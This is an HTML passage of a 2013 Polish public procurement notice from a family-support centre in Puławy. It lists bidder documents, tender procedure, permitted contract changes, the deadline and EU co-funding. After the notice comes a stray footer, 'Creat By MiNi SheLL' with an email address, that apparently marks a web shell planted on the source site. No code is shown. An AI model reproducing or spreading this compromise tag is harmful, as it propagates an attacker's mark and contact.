<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty wykonawcy, polegające na: a)zmianie terminu realizacji zamówienia, jednak w granicach czasowych określonych w SIWZ - w przypadku klęski żywiołowej lub gdy warunki atmosferyczne uniemożliwiają wykonanie zamówienia w terminie wynikającym z oferty, b)zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią wykonawcy wykonanie w części lub w całości jego zobowiązań, c)zmianie warunków płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu lub wytycznych instytucji wdrażającej dotyczących realizacji projektu, d)zmianie osób, przy pomocy których wykonawca realizować będzie zamówienie, wynikającej z ważnych przyczyn wskazanych przez wykonawcę, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowane przez wykonawcę w to miejsce osoby będą spełniały warunki określone w SIWZ; zmiana taka nie wymaga aneksu do umowy lecz jedynie pisemnej zgody zamawiającego, e)zmianie miejsca realizacji usługi, z zastrzeżeniem że proponowane w zamian miejsce spełnia warunki określone w SIWZ, zmiana taka jest możliwa jedynie po uprzednim wyjaśnieniu i udokumentowaniu przez wykonawcę przyczyn dokonania zmiany, a przyczyny te nie leżą po stronie wykonawcy i nie mogły być wcześniej przez niego przewidziane, f)zmianie w zakresie podwykonawstwa wyłącznie w sytuacji gdy konieczność jej dokonania wynika z ważnych i niemożliwych wcześniej do przewidzenia przyczyn oraz jest niezbędna w celu prawidłowej realizacji przedmiotu zamówienia, przy czym dokonana przez wykonawcę zmiana w powyższym zakresie bez zgody zamawiającego może skutkować rozwiązaniem przez zamawiającego niniejszej umowy ze skutkiem natychmiastowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 08:30, miejsce: Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3
24-100 Puławy
sekretariat pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> - Projekt systemowy Samodzielni - nie sami jest współfinansowany przez UE w ramach Priorytetu VII promocja integracji społecznej Działania 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie Programu Operacyjnego Kapitał Ludzki. - Zamawiający nie przewiduje zawarcia umowy ramowej ani udzielenia zamówień uzupełniających ani wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com